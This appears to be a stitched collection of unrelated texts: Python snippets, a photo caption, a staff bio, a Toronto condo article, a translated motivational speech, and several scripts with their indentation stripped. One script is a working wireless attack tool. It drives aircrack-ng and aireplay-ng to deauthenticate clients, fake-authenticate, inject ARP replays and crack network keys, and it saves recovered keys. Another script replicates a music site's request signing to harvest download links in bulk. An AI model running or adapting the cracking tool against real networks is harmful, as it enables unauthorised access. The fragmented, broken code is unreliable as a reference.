print('a', 'a', 'a', 'a', sep = 'A')
# global Statement
num = 0
def a():
global num  # without this, the assignment below would create a local
num = 42
a()
print(num)  # 42
# Exceptions
def spam(divideBy):
try:
return 42 / divideBy
except ZeroDivisionError:
print('Error: Invalid argument.')
print(spam(2))
print(spam(12))
print(spam(0))
print(spam(1))
|
More from the Arroyo series. The idea was to shoot my Watermelon Girl piece, but I had the girl, a beautiful day, and there was some nakedness happening. This girl was 19 at the time and having a real hard time figuring out life. Now as then, she is a sweet woman, and life seems to be settling down for her. Anyway: high-speed film, cross-processed. I love how the background turned out, and of course the model.
|
#!/usr/bin/env python
# - coding: utf-8 -
# Copyright (C) 2010 Toms Bauģis <toms.baugis at gmail.com>
"""Base template"""
from gi.repository import Gtk as gtk
from lib import graphics
import math
import hamster.client
import datetime as dt
from collections import defaultdict
import itertools
class Chart(graphics.Sprite):
def __init__(self):
graphics.Sprite.__init__(self, interactive = False)
def do_stuff(self, years, categories):
step = (360.0 / 365) * math.pi / 180.0
g = self.graphics
g.set_color("#999")
g.set_line_style(width = 1)
# em
colors = ["#009966", "#33cc00", "#9933cc", "#aaaaaa", "#ff9999", "#99cccc"]
colors.reverse()
# em contrast
colors = ["#00a05f", "#1ee100", "#a0a000", "#ffa000", "#a01ee1", "#a0a0a0", "#ffa0a0", "#a0e1e1"]
colors.reverse()
# tango light
colors = ["#fce94f", "#89e034", "#fcaf3e", "#729fcf", "#ad7fa8", "#e9b96e", "#ef2929", "#eeeeec", "#888a85"]
# tango medium
colors =["#edd400", "#73d216", "#f57900", "#3465a4", "#75507b", "#c17d11", "#cc0000", "#d3d7cf", "#555753"]
#colors = colors[1:]
#colors = ("#ff0000", "#00ff00", "#0000ff", "#aaa000")
hour_step = 15
spacing = 20
current_pixel = 1220
g.set_line_style(width = 1)
g.circle(0, 0, current_pixel - 2)
g.stroke("#fff", 0.2)
g.set_line_style(width=1)
for year in sorted(years.keys()):
for category in categories:
ring_height = hour_step * 3
for day, hours in years[year][category]:
year_day = day.isocalendar()[1] * 7 + day.weekday()
angle = year_day * step - math.pi / 2
distance = current_pixel
height = ring_height
#bar per category
g.move_to(math.cos(angle) * distance + 0,
math.sin(angle) * distance + 0)
g.line_to(math.cos(angle) * (distance + height),
math.sin(angle) * (distance + height))
g.line_to(math.cos(angle+step) * (distance + height),
math.sin(angle+step) * (distance + height))
g.line_to(math.cos(angle+step) * distance,
math.sin(angle+step) * distance)
g.close_path()
if years[year][category]:
current_pixel += ring_height + 7 + spacing
color = "#fff" #colors[categories.index(category)]
g.set_color(color)
g.fill()
current_pixel += spacing * 3
g.set_line_style(width = 4)
g.circle(0, 0, current_pixel - spacing * 2)
g.stroke("#fff", 0.5)
current_pixel += 3
class Scene(graphics.Scene):
def __init__(self):
graphics.Scene.__init__(self)
storage = hamster.client.Storage()
self.facts = storage.get_facts(dt.date(2009,1,1), dt.date(2009,12,31))
print(len(self.facts))
self.day_counts = {}
categories = defaultdict(int)
self.years = {}
for year, facts in itertools.groupby(sorted(self.facts, key=lambda fact:fact.date), lambda fact:fact.date.year):
self.years[year] = defaultdict(list)
for category, category_facts in itertools.groupby(sorted(facts, key=lambda fact:fact.category), lambda fact:fact.category):
for day, day_facts in itertools.groupby(sorted(category_facts, key=lambda fact:fact.date), lambda fact:fact.date):
delta = dt.timedelta()
for fact in day_facts:
delta += fact.delta
delta = delta.seconds / 60 / 60 + delta.days * 24
self.years[year][category].append((day, delta))
categories[category] += 1
self.categories = categories.keys()
self.chart = Chart()
self.add_child(self.chart)
self.chart.do_stuff(self.years, self.categories)
self.connect("on-enter-frame", self.on_enter_frame)
self.connect("on-mouse-move", self.on_mouse_move)
#self.animate(self.chart, rotation=math.pi * 2, duration = 3)
def on_mouse_move(self, scene, event):
x, y = self.width / 2, self.height / 2
max_distance = math.sqrt((self.width / 2) ** 2 + (self.height / 2) ** 2)
distance = math.sqrt((x - event.x) ** 2 + (y - event.y) ** 2)
#self.chart.scale_x = 2 - 2 * (distance / float(max_distance))
#self.chart.scale_y = 2 - 2 * (distance / float(max_distance))
#self.redraw()
def on_enter_frame(self, scene, context):
g = graphics.Graphics(context)
g.fill_area(0, 0, self.width, self.height, "#20b6de")
self.chart.x = self.width / 2
self.chart.y = self.height / 2
self.chart.scale_x = 0.18
self.chart.scale_y = 0.18
class BasicWindow:
def __init__(self):
window = gtk.Window()
window.set_size_request(700, 600)
window.connect("delete_event", lambda *args: gtk.main_quit())
window.add(Scene())
window.show_all()
example = BasicWindow()
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL) # gtk3 screws up ctrl+c
gtk.main()
|
Having lived all across the country and working in fields from non-profit administration, to membership acquisition, to event coordination, Lisa was eager to join the UC Davis community in 2018. Since joining the VC Admin team, she’s played an integral role in implementing the UC Path Project, and assisted with a wide variety of other projects throughout the FOA organization. Even as she grows her skills and knowledge within the university, Lisa also seeks to pursue her love of animals as an active member of the rescue community.
|
#!/usr/bin/python
import os, signal, sys
import commands
import subprocess
import random
import threading
import socket
import fcntl
import struct
from ConfigParser import ConfigParser
import time
#LOG_PATH = "/media/card/caps"
WIRELESS_DEVICE = "wlan0"  # used by getCellInfo() below
#MONITOR_DEVICE = "mon0"
MONITOR_MODE_CMD = "airmon-ng start wlan0"
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def get_hw_address(ifname):
import fcntl, struct
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
hwaddr = []
for char in info[18:24]:
hdigit = hex(ord(char))[2:]
if len(hdigit) == 1:
hdigit = "0%s" % hdigit
hwaddr.append(hdigit)
return hwaddr
def getCellInfo():
rawcells = commands.getoutput("iwlist %s scanning" % WIRELESS_DEVICE).split("Cell")
cells = {}
for celld in rawcells:
cell = {}
cell_data = celld.split('\n')
for field in cell_data:
field = field.strip()
vals = field.split(':')
#print vals
if "Address" in vals[0]:
if len(vals) < 7:
print vals
else:
cell["address"] = "%s:%s:%s:%s:%s:%s" % (vals[1], vals[2], vals[3], vals[4], vals[5], vals[6])
elif "Channel" in vals[0]:
cell["channel"] = vals[1]
elif "ESSID" in vals[0]:
cell["essid"] = vals[1].replace('"', '').upper()
elif "Quality" in vals[0]:
cell["quality"] = vals[0].split('=')[1]
if cell.has_key("essid"):
cells[cell["essid"]] = cell
return cells
def getCellByAddress(bssid, cells=None):
if cells is None:
cells = getCellInfo()
for cell in cells.values():
if cell["address"].lower() == bssid.lower():
return cell
return None
def isMonitorMode(monitor_device):
out = commands.getoutput("iwconfig %s" % monitor_device.name).lower()
if "mode:monitor" in out:
return True
return False
def setMonitorMode(wireless_device, monitor_device):
if isMonitorMode(monitor_device):
return True
print "setting device mode to 'Monitor'..."
commands.getoutput(MONITOR_MODE_CMD)
if isMonitorMode(monitor_device):
print "device now in monitor mode"
return True
print "failed to get device into monitor mode"
return False
FAKE_AUTH_CMD = "aireplay-ng -1 0 -a %s -h 00:26:F2:B7:71:C2 mon0"
CRACK_CMD = "aircrack-ng /caps/%s.*.cap"
class NetworkInterface(object):
"""docstring for NetworkInterface"""
def __init__(self, name):
self.name = name
self.ip = None
self.mac = None
def getMac(self):
if self.mac is None:
self.mac = ":".join(get_hw_address(self.name))
return self.mac
def getDynamicIP(self, ip):
pass
def setIP(self, ip):
pass
def changeMac(self, mac):
# take interface down
# change interface mac
# bring interface back up
pass
def setKey(self, key):
pass
def setEssid(self, essid):
out = commands.getoutput("iwconfig %s essid %s" % (self.name, essid))
if len(out) < 2:
return True
return False
def setChannel(self, channel):
out = commands.getoutput("iwconfig %s channel %s" % (self.name, channel))
if len(out) < 2:
return True
return False
class AccessPoint(object):
"""represents a wireless network"""
def __init__(self, mac, log_path):
self.mac = mac
self.vulnerability = 0
self.cracked = False
self.crack_attempts = 0
self.first_seen = None
self.last_seen = None
self.age = 5000
self.channel = 0
self.speed = 0
self.privacy = "n/a"
self.cipher = None
self.auth = None
self.power = 0
self.beacons = 0
self.ivs = 0
self.lan = 0
self.ip = 0
self.id_length = 0
self.essid = "n/a"
self.key = None
self.stations = {}
def update(self, fields):
# BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
if self.first_seen is None:
self.first_seen = time.mktime(time.strptime(fields[1].strip(), "%Y-%m-%d %H:%M:%S"))
try:
self.last_seen = time.mktime(time.strptime(fields[2].strip(), "%Y-%m-%d %H:%M:%S"))
except:
self.last_seen = 0
self.age = time.time() - self.last_seen
self.channel = int(fields[3].strip())
self.speed = int(fields[4].strip())
self.privacy = fields[5].strip()
self.cipher = fields[6].strip()
self.auth = fields[7].strip()
self.power = int(fields[8].strip())
self.beacons = int(fields[9].strip())
self.ivs = int(fields[10].strip())
self.ip = fields[11].strip()
self.id_length = fields[12].strip()
self.essid = fields[13].strip()
if len(self.essid) == 0:
self.essid = "unknown"
#if self.key is None or len(self.key) < 2:
# self.key = fields[14].strip()
def asJSON(self):
d = {}
for k, i in self.__dict__.items():
if type(i) in [str, int, float]:
d[k] = i
d["stations"] = {}
for s in self.stations.values():
d["stations"][s.mac] = s.asJSON()
return d
def __str__(self):
return "ap('%s'): channel: '%s' privacy: '%s' cipher: '%s' auth: %s power: '%s' " % (self.essid,
self.channel, self.privacy, self.cipher, self.auth, self.power)
class Station(object):
"""docstring for Station"""
def __init__(self, mac):
self.mac = mac
self.first_seen = None
self.last_seen = None
self.power = 0
self.packets = 0
self.ap_mac = None
def update(self, fields):
self.first_seen = fields[1]
self.last_seen = fields[2]
self.power = fields[3]
self.packets = fields[4]
self.ap_mac = fields[5]
def asJSON(self):
d = {}
for k, i in self.__dict__.items():
if type(i) in [str, int, float]:
d[k] = i
return d
class AttackProperties(object):
"""info about the current attack"""
def __init__(self, monitor_device, inject_device, log_path):
self.monitor_device = monitor_device
self.inject_device = inject_device
self.log_path = log_path
self.log_prefix = log_path
self.aps = {}
self.historic_aps = {}
self.target = None
self.history_file = os.path.join(log_path, "crack-history.ini")
self.loadHistory()
def hasAP(self, ap_mac):
return self.aps.has_key(ap_mac) or self.historic_aps.has_key(ap_mac)
def getAP(self, ap_mac):
if self.aps.has_key(ap_mac):
return self.aps[ap_mac]
elif self.historic_aps.has_key(ap_mac):
return self.historic_aps[ap_mac]
return None
def getActiveAP(self, ap_mac):
if self.aps.has_key(ap_mac):
return self.aps[ap_mac]
if self.historic_aps.has_key(ap_mac):
ap = self.historic_aps[ap_mac]
self.aps[ap_mac] = ap
return ap
return None
def addActiveAP(self, ap):
if not self.aps.has_key(ap.mac):
self.aps[ap.mac] = ap
def clearActive(self):
self.aps.clear()
def loadHistory(self):
if os.path.exists(self.history_file):
config = ConfigParser()
config.read(self.history_file)
for section in config.sections():
ap_mac = section
if ap_mac != None:
self.historic_aps[ap_mac] = AccessPoint(ap_mac, self.log_path)
self.historic_aps[ap_mac].first_seen = config.get(section, "first_seen", None)
self.historic_aps[ap_mac].last_seen = config.get(section, "last_seen", None)
self.historic_aps[ap_mac].essid = config.get(section, "essid", None)
if config.has_option(section, "key"):
self.historic_aps[ap_mac].key = config.get(section, "key", None)
def saveHistory(self):
config = ConfigParser()
config.read(self.history_file)
for ap_mac in self.aps:
if not config.has_section(ap_mac):
config.add_section(ap_mac)
ap = self.aps[ap_mac]
config.set(ap_mac, "first_seen", ap.first_seen)
config.set(ap_mac, "last_seen", ap.last_seen)
config.set(ap_mac, "essid", ap.essid)
if ap.key != None:
config.set(ap_mac, "key", ap.key)
with open(self.history_file, 'w') as configfile:
config.write(configfile)
def setTarget(self, target):
self.target = target
if self.target != None:
self.log_prefix = os.path.join(self.log_path, target.essid.replace(' ', '_'))
else:
self.log_prefix = self.log_path
def parseMonitorLog(log_file, attack_props):
"""update our info from the log files"""
if not os.path.exists(log_file):
return
report = open(log_file, 'r')
lines = report.readlines()
#print lines
report.close()
readingStations = False
readingAps = False
for line in lines:
line = line.strip()
#print line
if not readingStations and not readingAps:
if line.startswith("BSSID"):
readingAps = True
continue
elif line.startswith("Station"):
readingStations = True
continue
elif readingAps:
if len(line) < 4:
readingAps = False
else:
fields = line.split(',')
#print fields
ap_mac = fields[0].strip()
if attack_props.hasAP(ap_mac):
ap = attack_props.getActiveAP(ap_mac)
else:
ap = AccessPoint(ap_mac, attack_props.log_path)
attack_props.addActiveAP(ap)
ap.update(fields)
elif readingStations and len(line) > 4:
fields = line.split(',')
station_mac = fields[0].strip()
ap_mac = fields[5].strip()
if attack_props.hasAP(ap_mac):
ap = attack_props.getAP(ap_mac)
if ap.stations.has_key(station_mac):
station = ap.stations[station_mac]
else:
station = Station(station_mac)
ap.stations[station_mac] = station
station.ap = ap
station.update(fields)
class AirMonitor(object):
"""Monitors channels 1-12 for wireless networks"""
EXPLORE_COMMAND = "airodump-ng -o csv --ivs --write %s %s"
def __init__(self, attack_props, auto_start=False):
self.attack_props = attack_props
self.file_prefix = os.path.join(attack_props.log_path, "monitor")
self.monitor_log = self.file_prefix + "-01.csv"
self.process = None
self.aps = attack_props.aps
if auto_start:
self.start()
def isRunning(self):
try:
res = self.process != None and self.process.poll() is None
return res
except:
pass
return False
def start(self):
if self.process is None:
commands.getoutput("rm %s*" % self.file_prefix)
cmd = AirMonitor.EXPLORE_COMMAND % (self.file_prefix, self.attack_props.monitor_device.name)
self.FNULL = open('/dev/null', 'w')
self.process = subprocess.Popen(cmd, shell=True, stdout=self.FNULL, stderr=self.FNULL)
else:
raise Exception("AirMonitor already running")
def stop(self):
if self.process != None:
try:
self.process.kill()
commands.getoutput("kill -9 %s" % self.process.pid)
commands.getoutput("killall airodump-ng")
except:
pass
self.process = None
self.FNULL.close()
def update(self):
"""
self.attack_props.log_path + "-01.txt"
"""
parseMonitorLog(self.monitor_log, self.attack_props)
class AirCapture(AirMonitor):
"""Captures IVs into cap files for cracking WEPs"""
CAPTURE_COMMAND = "airodump-ng --channel %s --bssid %s --write %s %s"
def __init__(self, attack_props):
AirMonitor.__init__(self, attack_props, False)
self.file_prefix = attack_props.log_prefix
self.monitor_log = self.file_prefix + "-01.csv"
self.start()
def start(self):
commands.getoutput("rm %s*" % self.file_prefix)
cmd = AirCapture.CAPTURE_COMMAND % (self.attack_props.target.channel, self.attack_props.target.mac,
self.file_prefix, self.attack_props.monitor_device.name)
self.FNULL = open('/dev/null', 'w')
self.process = subprocess.Popen(cmd, shell=True, stdout=self.FNULL, stderr=self.FNULL)
class AirPlay(object):
"""Ability to inject packets into the wireless network we are attacking"""
ARP_INJECTION_CMD = "aireplay-ng -3 -b %s -h %s %s > %s-arp_inject.log"
DEAUTHENTICATE_CMD = "aireplay-ng --deauth %d -a %s -h %s"
FAKE_AUTHENTICATE_CMD = """aireplay-ng --fakeauth %d -e "%s" -a %s -h %s"""
def __init__(self, attack_props):
self.attack_props = attack_props
self.process = None
self.attack_props.monitor_device.setChannel(self.attack_props.target.channel)
def deauthenticate(self, count=1, target_mac=None):
"""Attempts to deauthenticate all stations or a target station"""
cmd = AirPlay.DEAUTHENTICATE_CMD % (count, self.attack_props.target.mac, self.attack_props.monitor_device.getMac())
if target_mac != None:
cmd += " -c %s" % target_mac
cmd += " %s" % self.attack_props.inject_device.name
lines = commands.getoutput(cmd).split('\n')
for line in lines:
if len(line) > 2:
if not "Waiting for beacon frame" in line: # spam
if not "No source MAC" in line: # spam
if not "Sending" in line: # spam
print "deauthentication errors: "
print "\n".join(lines)
return False
return True
def fakeAuthenticate(self, auth_delay=0, keep_alive_seconds=None, prga_file=None):
"""Fake authentication with AP"""
# setup the wireless card to be on the correct channel
# print "\tsetting channel: %d" % self.attack_props.target.channel
if not self.attack_props.monitor_device.setChannel(self.attack_props.target.channel):
print "failed to set correct channel for authentication"
return False
cmd = AirPlay.FAKE_AUTHENTICATE_CMD % (auth_delay, self.attack_props.target.essid,
self.attack_props.target.mac, self.attack_props.monitor_device.getMac())
# print cmd
if keep_alive_seconds != None:
cmd += " -q %i" % keep_alive_seconds
if prga_file != None:
cmd += " -y %s" % prga_file
cmd += " %s" % self.attack_props.monitor_device.name
lines = commands.getoutput(cmd).split('\n')
success = False
for line in lines:
if "Association successful" in line:
success = True
if "Authentication successful" in line:
success = True
elif "AP rejects open-system authentication" in line:
success = False
elif "Denied (Code 1) is WPA in use?" in line:
success = False
elif "doesn't match the specified MAC" in line:
success = False
elif "Attack was unsuccessful" in line:
success = False
# if not success:
# print lines
return success
def startArpInjection(self):
cmd = AirPlay.ARP_INJECTION_CMD % (self.attack_props.target.mac, self.attack_props.inject_device.getMac(),
self.attack_props.monitor_device.name, self.attack_props.log_prefix)
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def isRunning(self):
return self.process != None and self.process.poll() is None
def stop(self):
if self.process != None:
self.process.kill()
commands.getoutput("killall aireplay-ng")
self.process = None
class AirCracker(object):
"""runs a process that attempts to crack the network reading the captured packets"""
def __init__(self, attack_props, auto_start=True):
self.attack_props = attack_props
self.process = None
self.start()
def isRunning(self):
return self.process != None and self.process.poll() is None
def start(self, key_file=None, dictionary=None):
"""
This command starts a cracker and returns the key if it's able
to find it. Optional KeyFile can be used to specify a keyfile
otherwise all keyfiles will be used. If dictionary is specified
it will try to crack the key using it (WPA2). aircrack-ng will run
quietly until the key is found (WEP/WPA) or the cross-reference with
the dictionary fails.
Dictionary can be a string of several dicts separated by ","
Like: "dict1.txt,dictpro2.txt,others.txt"
"""
cmd = "aircrack-ng -q -b %s" % self.attack_props.target.mac # -q for quiet mode: only output the key if found
if dictionary != None: # Use dictionary if one is specified
cmd += " -w %s" % dictionary
if key_file is None: # if no keyfile is specified, use the standard capture path
cmd += " %s*.cap" % self.attack_props.log_prefix
else:
cmd += " %s" % key_file
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def stop(self):
if self.process != None:
self.process.kill()
commands.getoutput("killall aircrack-ng")
self.process = None
def checkResults(self):
if self.process is None:
return False
output = self.process.communicate()[0]
for line in output.split("\n"):
if not line == "":
if "KEY FOUND" in line: # Key found, lets call event KeyFound
words = line.split(" ")
#print words
self.attack_props.target.key = words[3]
self.attack_props.saveHistory()
return True
return False
|
An exploration of the role of mid-rise developments in Toronto's urban fabric.
Paul Johnston just looks like he belongs around Ossington and Dundas. Clad in dark jeans, a black cardigan, a black-and-white check shirt and thick-rimmed glasses, he would be easy to imagine as the guy at the next table at, say, Pizzeria Libretto.
But it’s a Wednesday morning and Mr. Johnston of Urban Unique Homes is preparing for another day as head of the sales team on the mid-rise condominium project called Abacus. The hip neighbourhood is part of what he’s selling. Buyers have also been drawn to the sophisticated, angular design by architect Richard Witt. “They’ve been driven by the architecture of the building, unquestionably,” Mr. Johnston says.
A rendering for the Abacus at Dundas and Ossington, light-infused lofts starting in the $300,000s, with an emphasis on edgy design that suits the neighbourhood.
Beyond these things, the seven-storey Abacus is selling the idea of mid-rise condominium living itself. It’s a pioneering example of a kind of building — tall enough to boost population density of a neighbourhood, short enough not to cloak it in shadows — that the city believes will play an important role in future growth.
Says Mr. Witt, the architect, who designed Abacus while a partner at Raw Design: “The mid-rise guidelines are trying to put density, in a modest fashion, on the arterial roads of the city” without disrupting the nearby single-family homes.
Among Abacus’s neighbourhood-friendly design features is a shape that becomes narrower at the top. It reduces shadow impact while creating terraces for buyers to enjoy when the building is completed in 2014.
Dundas is one of many major streets that the city calls “avenues.” Others include Eglinton Avenue, Yonge Street and Kingston Road. These streets are lined in many places with two- and three-storey retail-plus-apartment buildings from the 19th and early 20th centuries. Experts believe many of these buildings are underperforming and ought to be pulled down.
For instance, the buildings on Dundas Street West near Abacus house few people, and are unattractive to boot, aside from a few nice Victorian façades. “You could expect someone to tie their horse up out there,” Mr. Witt jokes. “I would say the scale of the street is probably the same as when it was built in the mid-1800s.” Abacus will occupy a spot where a squat and unattractive auto body shop once did business.
Mid-rises are seen as a way to intensify these neighbourhoods while arguably improving their aesthetic appeal. The report defines mid-rises as between five and 11 storeys, but in practice most would stand between six and nine. In Toronto, the width of the street determines the maximum height of a mid-rise. So a typical 27-metre-wide street can be lined with 27-metre-tall buildings, which works out to eight storeys.
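The street-width rule is simple arithmetic. A minimal sketch (the 3.375 m per storey is an assumed figure chosen for illustration so that 27 m works out to eight storeys; it is not a number taken from the city's guidelines):

```python
def max_storeys(street_width_m, storey_height_m=3.375):
    """Toronto's mid-rise rule of thumb: a building may rise no
    higher than the width of the street it faces (a 1:1 ratio)."""
    max_height_m = street_width_m  # height capped at street width
    return int(max_height_m // storey_height_m)

print(max_storeys(27))  # a 27-metre street allows eight storeys
```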
Buildings on this scale could absorb a quarter of a million new residents over the next two decades. Sites for potential redevelopment equal at least 200 kilometres’ worth of sidewalk-level frontage, counting both sides of the street. Streets built to the scale of a European city seem to be in Toronto’s future.
Having adopted the report’s recommendations two years ago, the city has indeed eased the approvals process for mid-block mid-rises, says Calvin Brook, an author of the 2010 mid-rise report. The city reasoned that “having the rules of the game understood would help incentivize the development community to start building more of these mid-rise buildings,” he says.
It has been working. Mr. Brook, a principal of the architecture and urban planning firm Brook McIlroy, cites other examples of mid-rises done right, including the Toronto Community Housing Corporation’s charmingly geometric 85-unit building at 60 Richmond St. E. and the Corktown District development by Streetcar.
As mid-rises proliferate, they could put large chunks of the city back on the map for first-time buyers. High prices for single-family homes on the side streets had put neighbourhoods like Ossington and Dundas out of reach.
As one would expect, many Abacus buyers have been lured to the area by the restaurants, galleries and nightlife blossoming on Dundas West and around the corner on Ossington. Perhaps more surprisingly, the sales centre has seen empty nesters as well. Mr. Johnston says many of the buyers already live in the neighbourhood.
Abacus will not be a fortress of hipsterdom.
Even residents who aren’t in the market for a condo have applauded the Abacus development, literally. “At a public meeting for this project, people actually did stand up and start clapping. That’s the only time that’s happened to me so far,” Mr. Witt says.
If the mid-rise revolution unfolds as planned across the 416, time will tell whether similar buildings will slot themselves into existing neighbourhoods as seamlessly.
|
#!/usr/bin/env python
# coding=utf8
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
import base64
import requests
import json
import urllib.request
import time
import random
import datetime
import hashlib
# Get the Content-Type field from the response headers
def urlOpenGetHeaders(url):
req = urllib.request.Request(url)
req.add_header('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36')
page = urllib.request.urlopen(req)
html = page.getheader('Content-Type')
return html
# Fetch the page source for a url
def urlOpen(url):
req = urllib.request.Request(url)
req.add_header('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36')
if False:
proxies = ['110.73.8.151:8123', '110.73.10.78:8123', '36.249.193.19:8118']
proxy = random.choice(proxies)
proxy_support = urllib.request.ProxyHandler({'http':proxy})
opener = urllib.request.build_opener(proxy_support)
opener.addheaders = [('User-Agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36')]
urllib.request.install_opener(opener)
page = urllib.request.urlopen(url)
else:
page = urllib.request.urlopen(req)
html = page.read()
return html
# Download to a local file given a name, extension and url
def download(title,post,url):
filename = title + "." +post
with open(filename, 'wb') as f:
music = urlOpen(url)
f.write(music)
def getPostStr(pKey, song_id):
rsaKey = RSA.importKey(pKey)
cipher = Cipher_pkcs1_v1_5.new(rsaKey)
encry = cipher.encrypt(song_id)
return base64.b64encode(encry)
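For reference, the request signature built in downloadMusicMain() below concatenates the song id and a millisecond timestamp as "songid|t" and hashes that with MD5 before it is RSA-wrapped via getPostStr. A stdlib-only sketch of just the hashing step (build_sign_digest is a hypothetical helper name, not part of this script):

```python
import hashlib
import time

def build_sign_digest(song_id, t_ms=None):
    # Mirrors the signing scheme used in the main loop below:
    # md5("<songid>|<t>"), where t is the time in milliseconds.
    if t_ms is None:
        t_ms = int(round(time.time() * 1000))
    src = "%s|%s" % (song_id, t_ms)
    return hashlib.md5(src.encode("utf8")).hexdigest()
```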
# Get the actual url of the song
def getSongRealUrl(songidVal,timeVal,md5Val):
url = 'http://www.aekun.com/api/getMusicbyid/'
r = requests.post(url, {
'songid': songidVal,
't':timeVal,
'sign':md5Val
})
return r.content
# Write the needed data to a local file
def writeStrToFile(writeStr):
print(writeStr)
with open("downurl.txt","a",encoding="UTF-8") as f:
f.write(writeStr)
f.write("\n")
# Get the latest recommended song id
def getMaxSongs():
url = "http://www.aekun.com/new/"
html = urlOpen(url).decode('utf-8')
a = html.find('<tr musicid=') + 13
b = html.find('"',a)
result = int(html[a:b])
return result
# Get the largest song id fetched so far
def getNowSongId(songIdInt):
f = open("downurl.txt","r",encoding="UTF-8")
lines = f.readlines() # read all lines
for line in lines:
if line.find('|')!=-1:
line = line.split("|")
line = int(line[0])
if line > songIdInt:
songIdInt = line
return songIdInt
# Main routine for downloading songs
def downloadMusicMain():
# Load the public key
f = open('public.pem')
pKey = f.read()
f.close()
songIdInt = 3509719
songIdInt = getNowSongId(songIdInt)
songIdInt = songIdInt + 1
maxSong = getMaxSongs()
print("start from:%s,end with:%s"%(songIdInt,maxSong))
# 3505251 |10 |2015084685 |▌▌Chillout ▌▌Losing Ground Michael FK & Groundfold -----3505251.mp3
while True:
if songIdInt > maxSong:
break
time.sleep(10)
try:
urlOpen("http://www.aekun.com/song/" + str(songIdInt))
except ConnectionResetError:
print("Error occur")
songId = str(songIdInt).encode('utf-8')
print(songId)
songidVal = getPostStr(pKey, songId)
songidVal = songidVal.decode('utf-8')
t = time.time()
t = int(round(t * 1000))
timeVal = getPostStr(pKey,str(t).encode('utf-8'))
timeVal = timeVal.decode('utf-8')
m2 = hashlib.md5()
src = str(songIdInt) + "|" + str(t)
m2.update(src.encode("utf8"))
t = m2.hexdigest()
md5Val = getPostStr(pKey,str(t).encode('utf-8'))
md5Val = md5Val.decode('utf-8')
try:
print(songidVal)
print(timeVal)
print(md5Val)
ret = getSongRealUrl(songidVal,timeVal,md5Val)
except (ConnectionError , ConnectionResetError):
print("ConnectionError")
time.sleep(3)
continue
ret = ret.decode('utf-8')
#ret = '{"state":"success","message":"ok","action":null,"data":{"url":"http://us.aekun.com/upload/75AAB77BC2D16123F9F2E8B6C68FCB8E.mp3","song_name":"就算遇到挫折、受到嘲笑,也要勇敢的向前跑!","coll":0,"singername":"小哥","singerpic":"https://m4.aekun.com/user_l_5973822_20170513135220.png"}}'
print(ret)
ret = json.loads(ret)
print(ret)
status = ret['state']
if status != 'success':
print(status)
break
downUrl = ret['data']
if isinstance(downUrl,str):
if downUrl.strip() == '':
html = urlOpen("http://www.aekun.com/song/" + str(songIdInt)).decode('utf-8')
songIdInt = songIdInt + 1
continue
elif isinstance(downUrl,dict):
pass
else:
continue
downUrl = ret['data']['url']
if downUrl is None:
continue
if downUrl.strip() == "":
continue
post = downUrl[-3:]
post = post.lower()
if post != 'mp3' and post != 'm4a':
tmp = urlOpenGetHeaders(downUrl)
if tmp.find('mp3') != -1:
post = 'mp3'
songName = ret['data']['song_name']
writeStr = "%-10s|%-50s|%-5s|%s"%(songIdInt,songName,post,downUrl)
writeStrToFile(writeStr)
songIdInt = songIdInt + 1
now = datetime.datetime.now()
now = now.strftime('%Y-%m-%d %H:%M:%S')
writeStrToFile(str(now) + '\t\t\t' + str(maxSong))
if __name__ == '__main__':
downloadMusicMain()
|
The Mexican motivational speaker Miguel Ángel Cornejo says: ON BEING MEDIOCRE AND ON BEING EXCELLENT. The mediocre person loves his bed like he loves himself. The mediocre person is born tired and lives to rest. The mediocre person rests by day so that he can sleep at night. If the mediocre person sees someone lying down, he at once offers support and assistance. The mediocre person knows that if a party ever conflicts with work, he is ready to leave the job.
For the mediocre person work is sacred, so he does not touch it. The mediocre person evades his duties and is always looking for someone else to do his work. The mediocre person reminds himself that no one ever died from resting. The mediocre person always leaves for tomorrow what he should do today. The mediocre person says to himself: "If work is health, let the sick do the working." When the mediocre person feels the urge to work, he looks for a quiet spot and waits patiently for the urge to pass. The excellent person, by contrast, greets the new day with a thousand projects to undertake. The excellent person knows that to enjoy rest he must finish the day with nothing left to give. The excellent person enjoys the night after a long day spent struggling to reach the stars.
The excellent person challenges those around him to fight. The excellent person renounces everything that hinders his dreams. For the excellent person, work is the means to achieve everything he wants. The excellent person takes on the hardest jobs and always moves forward. The excellent person is aware that this is the time in which he must build, and that there will be an eternity in which to rest in peace. For the excellent person the day is too short for all he has to do. For the excellent person the worst feeling is helplessness. The excellent person knows in his desires the scale of his achievements. The excellent person does everything the mediocre would never attempt, and is convinced that only through unconditional and generous dedication can he improve the world; he is the protagonist of change, the social architect of his time; the excellent person is, of course, a winner. Finally, esteemed entrepreneur, there are many obstacles to overcome if you want to realize your new venture, and the "sprout-tramplers" — those who crush budding ideas — are also an obstacle. But do not let anything disturb the decision you are about to take. I can only tell you that to watch the movie you need to go into the cinema; from outside you cannot see it. To win the game you must be part of the team; from the stands you will be just a spectator. Whatever your project or venture, this opportunity has not come to you for nothing, nor by accident. To say goodbye I leave you a short paragraph from the book of the seven laws, which reads: Uncertainty, on the other hand, is the fertile ground of pure creativity and freedom. Uncertainty means stepping into the unknown in every moment of our existence. The unknown is the field of all possibilities, always fresh, always new, always open to the creation of new manifestations. Without uncertainty and the unknown, life is only the stale repetition of outworn memories. Go forward with faith and enthusiasm. Good luck.
|
import argparse, cProfile, importlib, itertools, pstats, sys
